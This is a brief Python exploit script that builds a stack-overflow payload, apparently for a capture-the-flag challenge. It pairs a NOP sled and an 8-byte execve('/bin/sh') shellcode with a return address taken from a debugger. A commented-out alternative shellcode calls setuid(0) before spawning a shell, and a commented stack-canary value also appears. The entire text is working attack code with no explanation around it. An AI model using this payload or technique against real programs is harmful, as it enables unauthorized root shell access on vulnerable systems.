from struct import *  
#get key for second flag

#buffer addr in gdb
retAddr = pack("<I",0xbffff2e4)

#shellcode = "\x31\xc0\x31\xdb\x31\xc9\x31\xd2\xb0\x17\xcd\x80\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x31\xd2\x31\xc0\xb0\x0b\xcd\x80"

#shellcode in 8 bytes
#https://www.exploit-db.com/exploits/13627
shellcode="\x99\x6a\x0b\x58\x60\x59\xcd\x80"
#shellcode="\x80\xcd\x59\x60\x58\x0b\x6a\x99"
 
nop = "\x90" 

#canary = "\xbe\xba\xfe\xc"

payload = (nop * 16 + shellcode  + retAddr)
print(payload)
